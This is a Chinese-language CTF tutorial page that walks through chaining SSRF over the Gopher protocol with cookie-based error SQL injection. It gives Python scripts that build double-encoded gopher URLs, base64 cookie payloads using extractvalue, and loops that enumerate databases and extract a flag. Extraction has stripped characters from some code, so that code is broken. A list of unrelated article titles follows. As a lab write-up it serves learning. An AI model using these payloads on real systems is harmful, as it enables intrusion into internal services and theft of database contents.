当前位置：首页 > article >正文

从一道CTF题出发，手把手教你用Gopher协议玩转SSRF+SQL注入（附Python脚本）

article 2026/5/7 16:04:33

从零构建Gopher协议攻击链SSRF与SQL注入的深度实战指南当你第一次在CTF比赛中遇到SSRF漏洞时是否曾被Gopher协议的神秘面纱所困扰作为内网渗透中最强大的协议之一Gopher能够将SSRF的杀伤力提升到全新高度。本文将带你从协议原理到实战复现完整构建一条GopherSQL注入的攻击链。1. 环境侦察与漏洞定位任何成功的攻击都始于精准的信息收集。假设我们面对的是一个典型的CTF题目环境初步探测尝试基础输入如1和1测试注入点但发现没有明显回显源码审计查看页面源代码时发现隐藏的use.php端点协议识别访问该端点后确认存在SSRF漏洞专业选手往往会在源码注释、JS文件甚至错误信息中寻找隐藏端点这是CTF中的常见套路SSRF漏洞的核心价值在于它能绕过网络边界直接访问内网服务。以下是几种常见利用方式对比协议类型典型利用场景限制条件file://读取本地文件通常有路径限制dict://端口扫描和服务探测返回信息有限gopher://完整协议交互需要精确构造请求2. Gopher协议深度解析Gopher协议诞生于1991年虽然早已退出主流互联网舞台但在安全领域却焕发第二春。它的独特之处在于支持构造任意格式的网络请求能够封装HTTP、FTP等多种协议流量服务器端不会对请求头做严格校验一个典型的Gopher URL结构如下gopher://host:port/gopher-path_TCP数据流其中TCP数据流需要经过两次URL编码。来看一个实际的转换示例import urllib.parse original POST /index.php HTTP/1.1\r\n encoded urllib.parse.quote(urllib.parse.quote(original)) print(encoded) # 输出POST%2520/index.php%2520HTTP/1.1%250D%250A理解这个编码过程至关重要因为任何字符错误都会导致请求失败。常见需要特殊处理的字符包括空格 →%20→%2520回车换行 →%0D%0A→%250D%250A冒号 →%3A→%253A3. 构建初级攻击载荷让我们从最简单的身份认证绕过开始。假设我们发现目标使用基础的身份验证payload POST /login.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 25 unameadminpasswdadmin转换为Gopher格式的完整Python脚本from urllib.parse import quote def build_gopher_payload(data, host127.0.0.1, port80): encoded quote(quote(data)) return fgopher://{host}:{port}/_{encoded} http_request POST /login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 25 unameadminpasswdadmin print(build_gopher_payload(http_request))执行这个脚本后我们会得到一个完整的Gopher链接通过SSRF漏洞发送这个链接即可尝试登录。4. 发现并利用Cookie注入点在上一阶段成功获取到Cookie后我们发现响应头包含Set-Cookie: sessionYWRtaW4%3DBase64解码后得到admin这表明可能存在Cookie注入。我们构造报错注入载荷admin) and extractvalue(1, concat(0x7e, (select version),0x7e)) #对应的Python转换脚本sql_payload GET /index.php HTTP/1.1 Host: 127.0.0.1 Cookie: sessionYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoc2VsZWN0IEBAdmVyc2lvbiksMHg3ZSkpICM Connection: close print(build_gopher_payload(sql_payload))这个注入成功后会返回数据库版本信息确认注入点有效。接下来我们就可以进行更深入的数据探测。5. 自动化数据库枚举技术成熟的攻击者不会手动构造每个请求而是编写自动化脚本。以下是数据库枚举的完整流程获取当前数据库admin) and extractvalue(1, concat(0x7e, (select database()),0x7e)) #列出所有表table_payload GET /index.php HTTP/1.1 Host: 127.0.0.1 Cookie: sessionYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoU0VMRUNUIEdST1VQX0NPTkNBVCh0YWJsZV9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgV0hFUkUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkpLDB4N2UpKSAj Connection: close 提取表结构admin) and extractvalue(1, concat(0x7e, (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_nameusers),0x7e)) #将这些步骤封装成自动化工具def enumerate_database(): steps { current_db: select database(), tables: SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemadatabase(), columns: SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name{table} } results {} for name, query in steps.items(): payload build_sql_payload(query) results[name] send_payload(payload) return results6. 高级注入技术与数据提取当遇到数据截断时可以使用substring或left/right函数分段获取def extract_large_data(query, chunk_size30): result for i in range(0, 1000, chunk_size): chunk_query fselect substr(({query}),{i},{chunk_size}) payload build_sql_payload(chunk_query) chunk send_payload(payload) if not chunk: break result chunk return result对于最后的flag提取典型的攻击链如下确定flag可能在的表和列检查数据长度select length(flag) from flag_table分段获取数据select right(left(flag,40),20) from flag_table组合最终结果完整的Python自动化脚本应该包含以下功能Gopher请求构造器SQL注入载荷生成器响应解析器错误处理机制结果可视化输出在真实CTF比赛中这种系统化的方法远比临时拼凑的脚本高效可靠。记住理解每个技术环节的原理比单纯获取flag更重要——因为下一道题目总会以新的变种出现。

从一道CTF题出发，手把手教你用Gopher协议玩转SSRF+SQL注入（附Python脚本）

相关文章：

从一道CTF题出发，手把手教你用Gopher协议玩转SSRF+SQL注入（附Python脚本）

终极指南：3步解决Calibre中文路径变拼音问题，让你的电子书库重获清晰命名

为Hermes Agent实现主动消息推送：非侵入式AI智能体扩展实践

基于MCP协议的农业大宗商品气候风险AI情报引擎解析

为Gemini CLI打造AI开发全家桶：模块化配置提升编码效率

手把手教你用STM32F103ZET6的SPI点亮2.4寸TFT屏（附ILI9341初始化代码避坑指南）

ChatGPT Anywhere：零成本集成ChatGPT的浏览器扩展开发框架

MAA明日方舟助手：5分钟彻底告别重复刷图，全自动智能基建管理

XLSX I/O：如何在C语言项目中高效处理Excel文件？

收藏！后端转AI应用开发必看：2026年机会与避坑指南

LaTeX排版进阶：理解浮动体算法，让你的[htbp!]参数真正生效

Calibre中文路径插件：彻底解决电子书中文路径被拉丁化问题

Ryujinx：在PC上畅玩Switch游戏的终极模拟器解决方案

通用资源管理库resourcelib：统一抽象与声明式配置实践

采购成本总是说不清？怎么打造让老板一眼看透的采购成本地图？

MAA：明日方舟终极自动化助手，一键解放你的双手！[特殊字符]

终极QQ空间历史说说备份指南：GetQzonehistory完整使用教程

BEAST 2：如何用贝叶斯MCMC方法构建精确的进化树？

如何选择合适的防水卷材以应对不同项目需求？

特朗普家族涉足AI，WorldRouter平台能否打破AI模型使用价格壁垒？

【AISMM模型落地实战指南】：20年专家亲授技术生态建设的5大关键跃迁与避坑清单

别再死记硬背了！用CAPL脚本在CANoe里实现这5个自动化测试场景，效率翻倍

BitBake编译lighttpd时遇到‘Reconnecting to server’卡住？一个命令快速解决

告别裸机点阵：用LVGL V8.2给你的STM32 SPI屏做个炫酷Demo

VCS NLP低功耗仿真避坑指南：从UPF文件加载到Verdi Debug的完整实战

从“冒烟”实验到选型指南：搞懂电阻额定功率与二极管最大电流的实战意义

WarcraftHelper：魔兽争霸3引擎现代化改造与帧率优化技术方案

WordPress搬家换域名，后台进不去、样式全乱？宝塔面板下保姆级修复指南

TranslucentTB完整教程：三步打造Windows任务栏个性化终极方案

终极键盘控制鼠标指南：用Mouseable彻底解放你的双手